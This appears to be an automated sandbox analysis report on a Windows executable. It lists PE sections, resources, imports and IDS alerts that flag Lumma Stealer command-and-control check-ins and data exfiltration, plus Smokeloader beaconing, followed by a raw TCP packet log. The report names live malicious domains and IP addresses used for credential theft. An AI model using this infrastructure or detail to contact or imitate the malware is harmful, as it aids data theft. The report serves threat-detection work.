IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1d4f0	0x1d600	c6454d2cafb4ab6dcb7ef67e14d88a6b	False	0.8783826462765958	data	7.772500849471365	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x1f000	0x334a	0x3400	bd8aa091cb3f66e983f924d89d27c947	False	0.35682091346153844	data	5.007204292497535	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x23000	0x2022e8c	0xdc00	fb37c34a1d1b59c68f363290ba2081bf	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.cis	0x2046000	0x2d3	0x400	0f343b0931126a20f133d67c2b018a3b	False	0.0166015625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.yureg	0x2047000	0x400	0x400	0f343b0931126a20f133d67c2b018a3b	False	0.0166015625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x2048000	0x9a08	0x9c00	aa6ed883ebe6a4fbdcc9ac79a803f132	False	0.42790965544871795	data	4.643218916519892	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x204ec98	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.2953091684434968
RT_CURSOR	0x204fb40	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0			0.46705776173285196
RT_CURSOR	0x20503e8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0			0.5361271676300579
RT_ICON	0x2048420	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Tamil	India	0.47334754797441364
RT_ICON	0x2048420	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Tamil	Sri Lanka	0.47334754797441364
RT_ICON	0x20492c8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Tamil	India	0.5843862815884476
RT_ICON	0x20492c8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Tamil	Sri Lanka	0.5843862815884476
RT_ICON	0x2049b70	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Tamil	India	0.6514976958525346
RT_ICON	0x2049b70	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Tamil	Sri Lanka	0.6514976958525346
RT_ICON	0x204a238	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Tamil	India	0.7030346820809249
RT_ICON	0x204a238	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Tamil	Sri Lanka	0.7030346820809249
RT_ICON	0x204a7a0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Tamil	India	0.3700207468879668
RT_ICON	0x204a7a0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Tamil	Sri Lanka	0.3700207468879668
RT_ICON	0x204cd48	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Tamil	India	0.46224202626641653
RT_ICON	0x204cd48	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Tamil	Sri Lanka	0.46224202626641653
RT_ICON	0x204ddf0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Tamil	India	0.5393442622950819
RT_ICON	0x204ddf0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Tamil	Sri Lanka	0.5393442622950819
RT_ICON	0x204e778	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Tamil	India	0.6356382978723404
RT_ICON	0x204e778	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Tamil	Sri Lanka	0.6356382978723404
RT_STRING	0x2050be0	0x452	data	Tamil	India	0.45479204339963836
RT_STRING	0x2050be0	0x452	data	Tamil	Sri Lanka	0.45479204339963836
RT_STRING	0x2051038	0x28e	data	Tamil	India	0.481651376146789
RT_STRING	0x2051038	0x28e	data	Tamil	Sri Lanka	0.481651376146789
RT_STRING	0x20512c8	0x73e	data	Tamil	India	0.4261057173678533
RT_STRING	0x20512c8	0x73e	data	Tamil	Sri Lanka	0.4261057173678533
RT_ACCELERATOR	0x204ec58	0x40	data	Tamil	India	0.875
RT_ACCELERATOR	0x204ec58	0x40	data	Tamil	Sri Lanka	0.875
RT_GROUP_CURSOR	0x2050950	0x30	data			0.9375
RT_GROUP_ICON	0x204ebe0	0x76	data	Tamil	India	0.6610169491525424
RT_GROUP_ICON	0x204ebe0	0x76	data	Tamil	Sri Lanka	0.6610169491525424
RT_VERSION	0x2050980	0x25c	data			0.5281456953642384

Imports

DLL	Import
KERNEL32.dll	SetEndOfFile, LocalCompact, EnumCalendarInfoW, SetEnvironmentVariableW, GetTickCount, CreateNamedPipeW, GetConsoleAliasesA, EnumResourceTypesA, GetConsoleCP, GlobalAlloc, SetFileShortNameW, LoadLibraryW, IsProcessInJob, FatalAppExitW, AssignProcessToJobObject, IsBadCodePtr, ReplaceFileW, GetModuleFileNameW, GetSystemDirectoryA, GlobalUnlock, CreateJobObjectA, GetLastError, WriteConsoleInputW, VerLanguageNameW, LoadLibraryA, SetConsoleCtrlHandler, AddAtomW, HeapWalk, GetOEMCP, EnumDateFormatsA, GetModuleHandleA, GetProcessShutdownParameters, EnumResourceNamesA, GetFileTime, PeekConsoleInputA, GetDiskFreeSpaceExA, LCMapStringW, CreateFileW, HeapSize, FlushFileBuffers, FindVolumeClose, HeapCompact, GetProcAddress, CreateFileA, GetStringTypeW, WriteConsoleW, HeapReAlloc, GetCommandLineW, HeapSetInformation, GetStartupInfoW, DecodePointer, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EncodePointer, TerminateProcess, GetCurrentProcess, HeapAlloc, HeapFree, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, MultiByteToWideChar, ReadFile, GetModuleHandleW, ExitProcess, SetFilePointer, HeapCreate, WriteFile, FreeEnvironmentStringsW, GetEnvironmentStringsW, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, WideCharToMultiByte, GetConsoleMode, GetCPInfo, GetACP, IsValidCodePage, Sleep, RtlUnwind, SetStdHandle, IsProcessorFeaturePresent, CloseHandle
USER32.dll	GetMenu, CharUpperBuffW, SetCaretPos, GetMessageExtraInfo, DrawStateW, GetSysColorBrush
GDI32.dll	GetCharWidthI, CreateDCA, GetCharABCWidthsI
WINHTTP.dll	WinHttpOpen
MSIMG32.dll	AlphaBlend

Possible Origin

Language of compilation system	Country where language is spoken	Map
Tamil	India
Tamil	Sri Lanka

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-27T08:54:34.929033+0200	TCP	2054602	ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop)	50726	443	192.168.2.4	188.114.97.3
2024-07-27T08:54:50.578668+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	50744	80	192.168.2.4	78.89.199.216
2024-07-27T08:52:52.315081+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	50804	80	192.168.2.4	190.12.87.61
2024-07-27T08:53:58.536310+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	50687	80	192.168.2.4	78.89.199.216
2024-07-27T08:54:38.344547+0200	TCP	2054602	ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop)	50730	443	192.168.2.4	188.114.97.3
2024-07-27T08:54:18.995041+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	50699	80	192.168.2.4	78.89.199.216
2024-07-27T08:54:32.142488+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	50721	443	192.168.2.4	188.114.97.3
2024-07-27T08:54:31.311387+0200	TCP	2800584	ETPRO ACTIVEX Yahoo Messenger ActiveX Control Command Execution	443	50720	104.26.2.16	192.168.2.4
2024-07-27T08:54:07.533059+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	50694	80	192.168.2.4	78.89.199.216
2024-07-27T08:54:09.302452+0200	TCP	2011803	ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected	443	50695	185.149.100.242	192.168.2.4
2024-07-27T08:54:49.755743+0200	TCP	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	50743	443	192.168.2.4	172.67.213.85
2024-07-27T08:54:38.078895+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	50729	443	192.168.2.4	31.14.70.245
2024-07-27T08:54:29.692823+0200	UDP	2054591	ET MALWARE Lumma Stealer Domain in DNS Lookup (callosallsaospz .shop)	60712	53	192.168.2.4	1.1.1.1
2024-07-27T08:54:49.444090+0200	TCP	2054604	ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop)	50743	443	192.168.2.4	172.67.213.85
2024-07-27T08:55:26.643000+0200	TCP	2054604	ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop)	50782	443	192.168.2.4	172.67.213.85
2024-07-27T08:53:59.770679+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	50688	80	192.168.2.4	78.89.199.216
2024-07-27T08:54:06.289309+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	50693	80	192.168.2.4	78.89.199.216
2024-07-27T08:54:43.905246+0200	TCP	2054604	ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop)	50737	443	192.168.2.4	172.67.213.85
2024-07-27T08:54:44.585235+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	50737	443	192.168.2.4	172.67.213.85
2024-07-27T08:54:05.052245+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	50692	80	192.168.2.4	78.89.199.216
2024-07-27T08:53:29.849654+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	50679	80	192.168.2.4	78.89.199.216
2024-07-27T08:54:33.401004+0200	TCP	2054602	ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop)	50723	443	192.168.2.4	188.114.97.3
2024-07-27T08:54:33.913163+0200	TCP	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	50723	443	192.168.2.4	188.114.97.3
2024-07-27T08:53:26.228767+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	50676	80	192.168.2.4	78.89.199.216
2024-07-27T08:55:06.014573+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	50759	443	192.168.2.4	172.67.213.85
2024-07-27T08:54:39.949656+0200	TCP	2054602	ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop)	50732	443	192.168.2.4	188.114.97.3
2024-07-27T08:54:55.553885+0200	TCP	2054604	ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop)	50749	443	192.168.2.4	172.67.213.85
2024-07-27T08:54:43.379289+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	50736	443	192.168.2.4	172.67.213.85
2024-07-27T08:54:48.072204+0200	TCP	2054604	ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop)	50741	443	192.168.2.4	172.67.213.85
2024-07-27T08:54:00.985640+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	50689	80	192.168.2.4	78.89.199.216
2024-07-27T08:55:02.426507+0200	TCP	2054604	ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop)	50755	443	192.168.2.4	172.67.213.85
2024-07-27T08:54:02.228582+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	50690	80	192.168.2.4	78.89.199.216
2024-07-27T08:53:31.051539+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	50680	80	192.168.2.4	78.89.199.216
2024-07-27T08:54:24.157633+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	50705	80	192.168.2.4	78.89.199.216
2024-07-27T08:54:20.239644+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	50700	80	192.168.2.4	78.89.199.216
2024-07-27T08:53:54.297096+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	50685	20.114.59.183	192.168.2.4
2024-07-27T08:53:28.638794+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	50678	80	192.168.2.4	78.89.199.216
2024-07-27T08:54:50.801787+0200	TCP	2054604	ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop)	50746	443	192.168.2.4	172.67.213.85
2024-07-27T08:54:12.540705+0200	TCP	2101390	GPL SHELLCODE x86 inc ebx NOOP	443	50695	185.149.100.242	192.168.2.4
2024-07-27T08:55:05.322481+0200	TCP	2054604	ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop)	50759	443	192.168.2.4	172.67.213.85
2024-07-27T08:53:27.443527+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	50677	80	192.168.2.4	78.89.199.216
2024-07-27T08:53:33.493254+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	50682	80	192.168.2.4	78.89.199.216
2024-07-27T08:54:02.842293+0200	TCP	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	50691	80	192.168.2.4	64.190.113.113
2024-07-27T08:54:31.537129+0200	TCP	2054602	ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop)	50721	443	192.168.2.4	188.114.97.3
2024-07-27T08:55:06.908893+0200	TCP	2054604	ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop)	50761	443	192.168.2.4	172.67.213.85
2024-07-27T08:54:09.162429+0200	TCP	2011803	ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected	443	50695	185.149.100.242	192.168.2.4
2024-07-27T08:54:09.021203+0200	TCP	2020757	ET ADWARE_PUP Windows executable sent when remote host claims to send an image M2	443	50695	185.149.100.242	192.168.2.4
2024-07-27T08:54:48.601619+0200	TCP	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	50741	443	192.168.2.4	172.67.213.85
2024-07-27T08:54:41.528793+0200	TCP	2054602	ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop)	50734	443	192.168.2.4	188.114.97.3
2024-07-27T08:54:26.755088+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	50710	80	192.168.2.4	78.89.199.216
2024-07-27T08:53:34.940778+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	50683	80	192.168.2.4	78.89.199.216
2024-07-27T08:53:57.333420+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	50686	80	192.168.2.4	78.89.199.216
2024-07-27T08:54:27.939167+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	50713	80	192.168.2.4	78.89.199.216
2024-07-27T08:54:42.886858+0200	TCP	2054604	ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop)	50736	443	192.168.2.4	172.67.213.85
2024-07-27T08:54:42.365744+0200	UDP	2054593	ET MALWARE Lumma Stealer Domain in DNS Lookup (liernessfornicsa .shop)	59197	53	192.168.2.4	1.1.1.1
2024-07-27T08:54:36.320878+0200	TCP	2054602	ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop)	50727	443	192.168.2.4	188.114.97.3
2024-07-27T08:53:32.250796+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	50681	80	192.168.2.4	78.89.199.216
2024-07-27T08:54:30.720630+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	50717	443	192.168.2.4	188.114.97.3
2024-07-27T08:54:25.551880+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	50708	80	192.168.2.4	78.89.199.216
2024-07-27T08:54:10.554742+0200	TCP	2011803	ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected	443	50695	185.149.100.242	192.168.2.4
2024-07-27T08:54:21.519425+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	50702	80	192.168.2.4	78.89.199.216
2024-07-27T08:54:30.236223+0200	TCP	2054602	ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop)	50717	443	192.168.2.4	188.114.97.3
2024-07-27T08:53:16.134447+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49730	20.114.59.183	192.168.2.4

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 27, 2024 08:53:25.020642042 CEST	50676	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:25.025719881 CEST	80	50676	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:25.025791883 CEST	50676	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:25.025940895 CEST	50676	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:25.025964975 CEST	50676	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:25.031034946 CEST	80	50676	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:25.031049013 CEST	80	50676	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:26.227835894 CEST	80	50676	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:26.228564978 CEST	80	50676	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:26.228766918 CEST	50676	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:26.229167938 CEST	50676	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:26.231921911 CEST	50677	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:26.234174013 CEST	80	50676	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:26.237826109 CEST	80	50677	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:26.238071918 CEST	50677	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:26.238071918 CEST	50677	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:26.238071918 CEST	50677	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:26.243572950 CEST	80	50677	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:26.243613005 CEST	80	50677	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:27.443131924 CEST	80	50677	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:27.443428993 CEST	80	50677	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:27.443526983 CEST	50677	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:27.443527937 CEST	50677	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:27.446547031 CEST	50678	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:27.449243069 CEST	80	50677	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:27.451913118 CEST	80	50678	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:27.452153921 CEST	50678	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:27.452153921 CEST	50678	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:27.452153921 CEST	50678	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:27.457492113 CEST	80	50678	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:27.457911968 CEST	80	50678	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:28.638678074 CEST	80	50678	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:28.638720036 CEST	80	50678	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:28.638793945 CEST	50678	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:28.638943911 CEST	50678	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:28.642051935 CEST	50679	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:28.643753052 CEST	80	50678	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:28.646969080 CEST	80	50679	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:28.647039890 CEST	50679	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:28.647154093 CEST	50679	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:28.647170067 CEST	50679	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:28.652012110 CEST	80	50679	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:28.652040958 CEST	80	50679	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:29.849215031 CEST	80	50679	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:29.849586964 CEST	80	50679	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:29.849653959 CEST	50679	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:29.849700928 CEST	50679	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:29.852451086 CEST	50680	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:29.855314970 CEST	80	50679	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:29.858448029 CEST	80	50680	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:29.858566046 CEST	50680	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:29.858614922 CEST	50680	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:29.858614922 CEST	50680	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:29.864537001 CEST	80	50680	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:29.864578962 CEST	80	50680	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:31.051366091 CEST	80	50680	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:31.051419020 CEST	80	50680	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:31.051538944 CEST	50680	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:31.051750898 CEST	50680	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:31.054187059 CEST	50681	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:31.059257984 CEST	80	50680	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:31.059506893 CEST	80	50681	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:31.059767962 CEST	50681	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:31.059767962 CEST	50681	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:31.059767962 CEST	50681	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:31.065129995 CEST	80	50681	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:31.065172911 CEST	80	50681	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:32.250226974 CEST	80	50681	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:32.250484943 CEST	80	50681	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:32.250796080 CEST	50681	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:32.250796080 CEST	50681	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:32.253470898 CEST	50682	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:32.256366014 CEST	80	50681	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:32.259162903 CEST	80	50682	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:32.259424925 CEST	50682	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:32.259426117 CEST	50682	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:32.259426117 CEST	50682	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:32.265028000 CEST	80	50682	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:32.265069008 CEST	80	50682	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:33.493019104 CEST	80	50682	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:33.493025064 CEST	80	50682	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:33.493253946 CEST	50682	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:33.494923115 CEST	50682	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:33.498900890 CEST	50683	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:33.500425100 CEST	80	50682	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:33.506613970 CEST	80	50683	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:33.506709099 CEST	50683	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:33.506978035 CEST	50683	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:33.506978989 CEST	50683	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:33.512219906 CEST	80	50683	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:33.512259007 CEST	80	50683	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:34.940644979 CEST	80	50683	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:34.940720081 CEST	80	50683	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:34.940778017 CEST	50683	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:34.940942049 CEST	50683	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:34.941674948 CEST	80	50683	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:34.941742897 CEST	50683	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:34.943381071 CEST	50684	80	192.168.2.4	77.221.157.163
Jul 27, 2024 08:53:34.945734024 CEST	80	50683	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:34.945856094 CEST	50683	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:34.946816921 CEST	80	50683	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:34.949081898 CEST	80	50684	77.221.157.163	192.168.2.4
Jul 27, 2024 08:53:34.949307919 CEST	50684	80	192.168.2.4	77.221.157.163
Jul 27, 2024 08:53:34.949309111 CEST	50684	80	192.168.2.4	77.221.157.163
Jul 27, 2024 08:53:34.954670906 CEST	80	50684	77.221.157.163	192.168.2.4
Jul 27, 2024 08:53:56.112134933 CEST	50684	80	192.168.2.4	77.221.157.163
Jul 27, 2024 08:53:56.115117073 CEST	50686	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:56.120474100 CEST	80	50686	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:56.123366117 CEST	50686	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:56.123436928 CEST	50686	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:56.123476028 CEST	50686	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:56.128799915 CEST	80	50686	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:56.128839970 CEST	80	50686	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:57.333000898 CEST	80	50686	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:57.333290100 CEST	80	50686	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:57.333420038 CEST	50686	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:57.333868027 CEST	50686	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:57.336476088 CEST	50687	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:57.339039087 CEST	80	50686	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:57.341902971 CEST	80	50687	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:57.342179060 CEST	50687	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:57.342179060 CEST	50687	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:57.342179060 CEST	50687	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:57.347505093 CEST	80	50687	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:57.347543001 CEST	80	50687	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:58.536006927 CEST	80	50687	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:58.536052942 CEST	80	50687	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:58.536309958 CEST	50687	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:58.536401987 CEST	50687	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:58.539861917 CEST	50688	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:58.542021990 CEST	80	50687	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:58.544881105 CEST	80	50688	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:58.544965982 CEST	50688	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:58.545068979 CEST	50688	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:58.545068979 CEST	50688	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:58.550364017 CEST	80	50688	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:58.550875902 CEST	80	50688	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:59.759270906 CEST	80	50688	78.89.199.216	192.168.2.4
